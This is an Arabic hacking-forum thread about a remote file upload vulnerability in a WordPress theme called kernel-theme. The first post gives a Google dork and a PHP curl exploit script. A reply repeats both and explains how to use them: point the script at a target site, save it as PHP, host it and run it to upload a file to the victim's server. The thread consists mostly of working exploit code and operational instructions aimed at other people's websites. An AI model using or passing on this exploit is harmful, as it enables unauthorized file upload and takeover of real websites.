اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

اين هو الاستغلال وكيفية الاسغلال

اين هو الاستغلال وكيفية الاسغلال


النتائج 1 إلى 2 من 2

الموضوع: اين هو الاستغلال وكيفية الاسغلال

  1. #1
    هكر نشيط Array الصورة الرمزية hacker@dz
    تاريخ التسجيل
    Oct 2013
    الدولة
    no ip
    المشاركات
    195

    Come اين هو الاستغلال وكيفية الاسغلال



    السلام عليكم كيفكم يا اعضاء ارجوا منكم حل لمشكلتي لم اعرف اين هو الدورك وكيفية الاسغلال هذه الثغرة الخاصة ب الورد بيس
    #############
    # Exploit Title: WordPress themekernel-theme Themes Remote File Upload Vulnerability
    # Author: iskorpitx
    # Date: 6/11/2013
    # Vendor Homepage: http://www.wikmag.com/
    # Themes Link: http://themeforest.net/item/kernel-p...-theme-/857077
    # Infected File: upload-handler.php
    # Category: webapps
    # Google dork: inurl:/wp-content/themes/kernel-theme/
    # Tested on : Windows/Linux
    ################################################## #################################################

    # Exploit


    <?php
    $uploadfile="upload.php";
    $ch = curl_init("http://127.0.0.1/wp-content/themes/kernel-theme/functions/upload-handler.php");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('orange_themes'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $postResult = curl_exec($ch);
    curl_close($ch); print "$postResult";
    ?>

    http://127.0.0.1/wordpress/wp-conten.../11/upload.php




    All http://www.mavi1.org members

    - - - تم التحديث - - -

    وين الاستغلال ي ااخوان وكيفية استغلال



  2. #2
    هكر متميز Array الصورة الرمزية rakan-2011
    تاريخ التسجيل
    Oct 2011
    الدولة
    السـعــوديــُـــُـے
    المشاركات
    1,122

    افتراضي رد: اين هو الاستغلال وكيفية الاسغلال

    وعليكم السلام ورحمة الله وبركاته ,

    الدورك
    inurl:/wp-content/themes/kernel-theme

    الاستغلال يتم عمل ملف جديد وداخله "

    <?php
    $uploadfile="upload.php";
    $ch = curl_init("http://127.0.0.1/wp-content/themes/kernel-theme/functions/upload-handler.php");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('orange_themes'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $postResult = curl_exec($ch);
    curl_close($ch); print "$postResult";
    ?>
    ويتم تعديل http://127.0.0.1/wp-content/themes/k...ad-handler.php

    فقط تغيير http://127.0.0.1 إلى رابط الموقع المستهدف اذا كان باسم مجلد اخر يضاف معاه مثال اسم المجلد site بيكون
    http://127.0.0.1/site

    حفظه بصيغة php بالاسم الذي تريده .
    ورفعه على السيرفر الشخصي او موقع اخر ..

    واستعراضه .

    بتوفيق لك !


المواضيع المتشابهه

  1. سكريبت فحص ثغرات jce + اداة الاستغلال ^_*
    بواسطة touita في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 9
    آخر مشاركة: 11-06-2013, 05:07 PM
  2. الاستغلال
    بواسطة mjnon97 في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 2
    آخر مشاركة: 07-31-2013, 07:27 PM
  3. ثغرة vlc من نوع buffer overflow شرح الاستغلال فيديو
    بواسطة touita في المنتدى قسم الثغرات
    مشاركات: 10
    آخر مشاركة: 03-27-2013, 12:59 AM
  4. ثلاث مواقع مصابة بثغرة Admin bypass بسيطة الاستغلال
    بواسطة HaCKer011 في المنتدى قسم الثغرات
    مشاركات: 3
    آخر مشاركة: 05-11-2012, 06:34 PM
  5. جميع دوركات..SQL injection + شرح طريقة الاستغلال واختراق الموقع (الشرح بالصور) ...
    بواسطة QtRoNiX FoX في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 14
    آخر مشاركة: 01-24-2012, 02:45 PM

وجد الزوار هذه الصفحة بالبحث عن:

inurl wp-contentthemeskernel-theme

wordpress remote file upload vulnerability شرح

http:127.0.0.1wp-content هكر

&amp;#1593;&amp;#1579;&amp;#1608;&amp;#1585; &amp;#1593;&amp;#1604;&amp;#1610; &amp;#1605;&amp;#1608;&amp;#1575;&amp;#1602;&amp;#1593; &amp;#1605;&amp;#1589;&amp;#1575;&amp;#1576;&amp;#1607; &amp;#1576; &amp;#8207;jce

inurl : video uploader.php

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •